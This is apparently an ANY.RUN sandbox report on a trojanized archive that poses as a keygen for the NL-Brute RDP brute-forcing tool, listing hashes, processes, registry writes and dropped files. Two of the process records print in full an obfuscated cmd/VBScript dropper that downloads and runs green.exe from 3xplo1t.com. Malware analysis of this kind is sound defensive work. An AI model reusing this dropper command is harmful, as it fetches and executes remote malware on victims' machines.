File name:

NL-Brute 1.2 x64 & 1.2 x64 VPN Edition - KEYGEN.7z

Full analysis: https://app.any.run/tasks/87da4e6e-8ebf-4e25-a2ce-5367add31653
Verdict: Malicious activity
Analysis date: November 20, 2018, 17:34:02
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MIME: application/x-7z-compressed
File info: 7-zip archive data, version 0.4
MD5:

37398F3A62624CC800F8BD0FBDE14864

SHA1:

53FE5275EB42ED0D13E32ACEE6FC4411335984EE

SHA256:

08443ACA2D1C220360CA6409D7062995DD4C9034A90D26A19A73F670D2224E6D

SSDEEP:

196608:1+nirUSrXcsLhUP+tNLg9VR8hrPg/wnOPeZxNXYdsaysWfLBrcLvHfnrhm9:qirNXcsLtN09VRo6wnGUXYdsay/DBYvE

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • NLBrute 1.2 x64 & VPN.exe (PID: 3492)
      • NLBrute 1.2 x64.exe (PID: 3344)
  • SUSPICIOUS

    • Executable content was dropped or overwritten

      • WinRAR.exe (PID: 3360)
      • NLBrute 1.2 x64 & VPN.exe (PID: 3492)
      • NLBrute 1.2 x64.exe (PID: 3344)
    • Executes scripts

      • NLBrute 1.2 x64 & VPN.exe (PID: 3492)
      • NLBrute 1.2 x64.exe (PID: 3344)
      • cmd.exe (PID: 2836)
      • cmd.exe (PID: 2764)
    • Starts CMD.EXE for commands execution

      • WScript.exe (PID: 3456)
      • WScript.exe (PID: 3308)
  • INFO

    No info indicators.
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.7z | 7-Zip compressed archive (v0.4) (57.1)
.7z | 7-Zip compressed archive (gen) (42.8)
No data.
All screenshots are available in the full report
Total processes
43
Monitored processes
11
Malicious processes
2
Suspicious processes
0

Behavior graph

Processes shown in the graph (entries marked "no specs" carry no specific indicators):
  • start
  • winrar.exe
  • nlbrute 1.2 x64 & vpn.exe
  • wscript.exe (no specs)
  • cmd.exe (no specs)
  • wscript.exe (no specs)
  • timeout.exe (no specs)
  • nlbrute 1.2 x64.exe
  • wscript.exe (no specs)
  • cmd.exe (no specs)
  • wscript.exe (no specs)
  • timeout.exe (no specs)

Process information

PID
CMD
Path
Indicators
Parent process
PID: 1272
CMD: "C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\X6j.vBe"
Path: C:\Windows\System32\WScript.exe
Parent process: cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
Modules
Images
c:\windows\system32\wscript.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
PID: 1464
CMD: timeout 12
Path: C:\Windows\system32\timeout.exe
Parent process: cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
timeout - pauses command processing
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\timeout.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\ws2_32.dll
PID: 2152
CMD: "C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\X6j.vBe"
Path: C:\Windows\System32\WScript.exe
Parent process: cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
Modules
Images
c:\windows\system32\wscript.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
PID: 2552
CMD: timeout 12
Path: C:\Windows\system32\timeout.exe
Parent process: cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
timeout - pauses command processing
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\timeout.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\ws2_32.dll
PID: 2764
CMD: "C:\Windows\System32\cmd.exe" /C Cd %TemP% & @EChO B3c = "http://3xplo1t.com/green.exe">>X6j.vBe &@EChO V9e = Z5d("pt`Mdwd")>>X6j.vBe &@EChO Set U8s = CreateObject(Z5d("lrwlkQMwlkgsso"))>>X6j.vBe &@EChO U8s.Open Z5d("fds"), B3c, False>>X6j.vBe &@EChO U8s.send ("")>>X6j.vBe &@EChO Set S1f = CreateObject(Z5d("`cncaMrsqd`l"))>>X6j.vBe &@EChO S1f.Open>>X6j.vBe &@EChO S1f.Type = 1 >>X6j.vBe &@EChO S1f.Write U8s.ResponseBody>>X6j.vBe & @EChO S1f.Position = 0 >>X6j.vBe &@EChO S1f.SaveToFile V9e, 2 >>X6j.vBe &@EChO S1f.Close>>X6j.vBe &@EChO function Z5d(O3z) >> X6j.vBe &@EChO For J8x = 1 To Len(O3z) >>X6j.vBe &@EChO A7l = Mid(O3z, J8x, 1) >>X6j.vBe &@EChO A7l = Chr(Asc(A7l)- 31) >>X6j.vBe &@EChO V7b = V7b + A7l >> X6j.vBe &@EChO Next >>X6j.vBe &@EChO Z5d = V7b >>X6j.vBe &@EChO End Function >>X6j.vBe& X6j.vBe &DEL X6j.vBe & timeout 12 & QUA.EXE
Path: C:\Windows\System32\cmd.exe
Parent process: WScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
PID: 2836
CMD: "C:\Windows\System32\cmd.exe" /C Cd %TemP% & @EChO B3c = "http://3xplo1t.com/green.exe">>X6j.vBe &@EChO V9e = Z5d("pt`Mdwd")>>X6j.vBe &@EChO Set U8s = CreateObject(Z5d("lrwlkQMwlkgsso"))>>X6j.vBe &@EChO U8s.Open Z5d("fds"), B3c, False>>X6j.vBe &@EChO U8s.send ("")>>X6j.vBe &@EChO Set S1f = CreateObject(Z5d("`cncaMrsqd`l"))>>X6j.vBe &@EChO S1f.Open>>X6j.vBe &@EChO S1f.Type = 1 >>X6j.vBe &@EChO S1f.Write U8s.ResponseBody>>X6j.vBe & @EChO S1f.Position = 0 >>X6j.vBe &@EChO S1f.SaveToFile V9e, 2 >>X6j.vBe &@EChO S1f.Close>>X6j.vBe &@EChO function Z5d(O3z) >> X6j.vBe &@EChO For J8x = 1 To Len(O3z) >>X6j.vBe &@EChO A7l = Mid(O3z, J8x, 1) >>X6j.vBe &@EChO A7l = Chr(Asc(A7l)- 31) >>X6j.vBe &@EChO V7b = V7b + A7l >> X6j.vBe &@EChO Next >>X6j.vBe &@EChO Z5d = V7b >>X6j.vBe &@EChO End Function >>X6j.vBe& X6j.vBe &DEL X6j.vBe & timeout 12 & QUA.EXE
Path: C:\Windows\System32\cmd.exe
Parent process: WScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
PID: 3308
CMD: "C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\FA.js"
Path: C:\Windows\System32\WScript.exe
Parent process: NLBrute 1.2 x64.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
Modules
Images
c:\windows\system32\wscript.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
PID: 3344
CMD: "C:\Users\admin\Desktop\NL-Brute 1.2 x64 & 1.2 x64 VPN Edition - KEYGEN\NLBrute 1.2 x64.exe"
Path: C:\Users\admin\Desktop\NL-Brute 1.2 x64 & 1.2 x64 VPN Edition - KEYGEN\NLBrute 1.2 x64.exe
Parent process: explorer.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
Modules
Images
c:\users\admin\desktop\nl-brute 1.2 x64 & 1.2 x64 vpn edition - keygen\nlbrute 1.2 x64.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\wsock32.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\nsi.dll
c:\windows\system32\version.dll
PID: 3360
CMD: "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\NL-Brute 1.2 x64 & 1.2 x64 VPN Edition - KEYGEN.7z"
Path: C:\Program Files\WinRAR\WinRAR.exe
Parent process: explorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Exit code:
0
Version:
5.60.0
Modules
Images
c:\program files\winrar\winrar.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\comdlg32.dll
PID: 3456
CMD: "C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\FA.js"
Path: C:\Windows\System32\WScript.exe
Parent process: NLBrute 1.2 x64 & VPN.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
Modules
Images
c:\windows\system32\wscript.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
Total events
2 133
Read events
2 076
Write events
57
Delete events
0

Modification events

(PID) Process: (3360) WinRAR.exe
Key: HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes
Operation: write
Name: ShellExtBMP
Value:

(PID) Process: (3360) WinRAR.exe
Key: HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes
Operation: write
Name: ShellExtIcon
Value:

(PID) Process: (3360) WinRAR.exe
Key: HKEY_CLASSES_ROOT\Local Settings\MuiCache\5F\52C64B7E
Operation: write
Name: LanguageList
Value: en-US

(PID) Process: (3360) WinRAR.exe
Key: HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation: write
Name: 0
Value: C:\Users\admin\AppData\Local\Temp\NL-Brute 1.2 x64 & 1.2 x64 VPN Edition - KEYGEN.7z

(PID) Process: (3360) WinRAR.exe
Key: HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation: write
Name: name
Value: 120

(PID) Process: (3360) WinRAR.exe
Key: HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation: write
Name: size
Value: 80

(PID) Process: (3360) WinRAR.exe
Key: HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation: write
Name: type
Value: 120

(PID) Process: (3360) WinRAR.exe
Key: HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation: write
Name: mtime
Value: 100

(PID) Process: (3360) WinRAR.exe
Key: HKEY_CURRENT_USER\Software\WinRAR\Interface
Operation: write
Name: ShowPassword
Value: 0

(PID) Process: (3492) NLBrute 1.2 x64 & VPN.exe
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation: write
Name: UNCAsIntranet
Value: 0
Executable files
5
Suspicious files
1
Text files
27
Unknown types
0

Dropped files

PID
Process
Filename
Type
PID: 3492
Process: NLBrute 1.2 x64 & VPN.exe
Filename: C:\Users\admin\AppData\Local\Temp\autCF85.tmp
Type:
MD5:
SHA256:

PID: 3492
Process: NLBrute 1.2 x64 & VPN.exe
Filename: C:\Users\admin\AppData\Local\Temp\autDD42.tmp
Type:
MD5:
SHA256:

PID: 3344
Process: NLBrute 1.2 x64.exe
Filename: C:\Users\admin\AppData\Local\Temp\autABA.tmp
Type:
MD5:
SHA256:

PID: 3344
Process: NLBrute 1.2 x64.exe
Filename: C:\Users\admin\AppData\Local\Temp\aut1847.tmp
Type:
MD5:
SHA256:

PID: 3360
Process: WinRAR.exe
Filename: C:\Users\admin\AppData\Local\Temp\Rar$DRb3360.27643\NL-Brute 1.2 x64 & 1.2 x64 VPN Edition - KEYGEN\NLBrute 1.2 x64 & VPN - KeyGen\key.txt
Type: text
MD5:
SHA256:

PID: 3360
Process: WinRAR.exe
Filename: C:\Users\admin\AppData\Local\Temp\Rar$DRb3360.27643\NL-Brute 1.2 x64 & 1.2 x64 VPN Edition - KEYGEN\NLBrute 1.2 x64 & VPN.exe
Type: executable
MD5:
SHA256:

PID: 3360
Process: WinRAR.exe
Filename: C:\Users\admin\AppData\Local\Temp\Rar$DRb3360.27643\NL-Brute 1.2 x64 & 1.2 x64 VPN Edition - KEYGEN\NLBrute 1.2 x64.exe
Type: executable
MD5:
SHA256:

PID: 3492
Process: NLBrute 1.2 x64 & VPN.exe
Filename: C:\Users\admin\AppData\Local\Temp\FA.js
Type: text
MD5:
SHA256:

PID: 3360
Process: WinRAR.exe
Filename: C:\Users\admin\AppData\Local\Temp\Rar$DRb3360.27643\NL-Brute 1.2 x64 & 1.2 x64 VPN Edition - KEYGEN\settings.ini
Type: text
MD5:
SHA256:

PID: 3360
Process: WinRAR.exe
Filename: C:\Users\admin\AppData\Local\Temp\Rar$DRb3360.27643\NL-Brute 1.2 x64 & 1.2 x64 VPN Edition - KEYGEN\a3e0dfcaa65540c2b2295df658e1294e.png
Type: image
MD5: D2C7DF27E3508AC727337D45CF64D105
SHA256: 36C7B94542AE79E27F02324519467BD2850FE45B86675EBE6748D6B0D901B3CF
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
0
DNS requests
1
Threats
0

HTTP requests

No HTTP requests

Connections

No data

DNS requests

Domain: 3xplo1t.com
IP: (not resolved)
Reputation: unknown

Threats

No threats detected
No debug info